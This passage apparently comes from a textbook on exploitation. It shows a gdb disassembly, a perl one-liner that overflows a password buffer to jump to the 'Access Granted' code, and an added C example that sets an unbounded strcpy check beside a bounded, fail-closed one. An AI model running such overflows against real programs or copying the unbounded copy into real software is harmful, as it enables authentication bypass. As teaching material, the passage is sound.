0x0804848d <main+25>: mov eax,DWORD PTR [eax]
0x0804848f <main+27>: mov DWORD PTR [esp+4],eax
0x08048493 <main+31>: mov DWORD PTR [esp],0x80485e5
0x0804849a <main+38>: call 0x804831c <printf@plt>
0x0804849f <main+43>: mov DWORD PTR [esp],0x0
0x080484a6 <main+50>: call 0x804833c <exit@plt>
0x080484ab <main+55>: mov eax,DWORD PTR [ebp+12]
0x080484ae <main+58>: add eax,0x4
0x080484b1 <main+61>: mov eax,DWORD PTR [eax]
0x080484b3 <main+63>: mov DWORD PTR [esp],eax
0x080484b6 <main+66>: call 0x8048414 <check_authentication>
0x080484bb <main+71>: test eax,eax
0x080484bd <main+73>: je 0x80484e5 <main+113>
0x080484bf <main+75>: mov DWORD PTR [esp],0x80485fb
0x080484c6 <main+82>: call 0x804831c <printf@plt>
0x080484cb <main+87>: mov DWORD PTR [esp],0x8048619
0x080484d2 <main+94>: call 0x804831c <printf@plt>
0x080484d7 <main+99>: mov DWORD PTR [esp],0x8048630
0x080484de <main+106>: call 0x804831c <printf@plt>
0x080484e3 <main+111>: jmp 0x80484f1 <main+125>
0x080484e5 <main+113>: mov DWORD PTR [esp],0x804864d
0x080484ec <main+120>: call 0x804831c <printf@plt>
0x080484f1 <main+125>: leave
0x080484f2 <main+126>: ret
End of assembler dump.
(gdb)
The section of code beginning at 0x080484bf (shown in bold in the original listing) contains the instructions that display the Access Granted message. If the return address is overwritten with this value, this block of instructions will be executed. The exact distance between the return address and the start of password_buffer can change with different compiler versions and different optimization flags. As long as the start of the buffer is aligned with DWORDs on the stack, this variability can be accounted for by simply repeating the return address many times. This way, at least one of the instances will overwrite the return address, even if its position has shifted due to compiler optimizations.
reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Segmentation fault (core dumped)
reader@hacking:~/booksrc $
In the example above, the target address of 0x080484bf is repeated 10 times
to ensure the return address is overwritten with the new target address. When
the check_authentication() function returns, execution jumps directly to the
new target address instead of returning to the next instruction after the call.
This gives us more control; however, we are still limited to using instructions
that exist in the original programming.
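The function being overflowed is not shown on this page, only its call site at main+66. The block below is an added example, not the book's auth_overflow2.c: a constructed stand-in for check_authentication() in the unbounded form the session above relies on, beside a bounded form that rejects any input that would reach the saved frame pointer or return address. The buffer size (16 bytes), the two accepted passwords and the helper names are all assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the book's auth_overflow2.c: a stand-in for the
 * check_authentication() called at main+66 above, first in the unbounded
 * form the overflow relies on, then in a bounded form that cannot write
 * past the buffer.  BUF_SIZE and the two passwords are constructed here. */

#define BUF_SIZE 16

/* Unbounded stand-in.  strcpy() stops only at the NUL terminator, so a
 * password of BUF_SIZE bytes or more runs past password_buffer into the
 * saved frame pointer and the return address that the session above
 * overwrites.  Only ever called here with short, fixed input. */
int check_authentication_unsafe(const char *password) {
    char password_buffer[BUF_SIZE];
    int auth_flag = 0;

    strcpy(password_buffer, password);          /* no length check at all */

    if (strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if (strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;
    return auth_flag;
}

/* Length of s, never reading more than max bytes (a portable stand-in
 * for strnlen(), written out so the example needs only ISO C). */
static size_t bounded_len(const char *s, size_t max) {
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Does this input exceed what password_buffer can hold, terminator
 * included?  This is the check to look for in front of any fixed-size copy. */
int would_overflow(const char *password) {
    return bounded_len(password, BUF_SIZE) >= BUF_SIZE;
}

/* Hardened stand-in.  Overlong input is rejected before a single byte is
 * copied, so the copy can never leave password_buffer and the saved return
 * address stays intact regardless of how the compiler laid out the frame. */
int check_authentication_safe(const char *password) {
    char password_buffer[BUF_SIZE];
    int auth_flag = 0;
    size_t len = bounded_len(password, BUF_SIZE);

    if (len >= BUF_SIZE)                        /* would overflow: fail closed */
        return 0;
    memcpy(password_buffer, password, len);
    password_buffer[len] = '\0';

    if (strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if (strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;
    return auth_flag;
}

int main(void) {
    /* Constructed input: 40 bytes, the same length as the ten repeated
     * 4-byte addresses in the session above, but printable. */
    char overlong[41];
    memset(overlong, 'A', 40);
    overlong[40] = '\0';

    printf("brillig  -> safe=%d\n", check_authentication_safe("brillig"));
    printf("wrong    -> safe=%d\n", check_authentication_safe("wrong"));
    printf("40 bytes -> would_overflow=%d safe=%d\n",
           would_overflow(overlong), check_authentication_safe(overlong));
    return 0;
}
```

The bounded version fails closed: an input of 16 or more bytes is refused outright rather than truncated, which is what makes the repeated-address trick in the session above irrelevant to it, since no byte is ever written beyond the buffer in the first place.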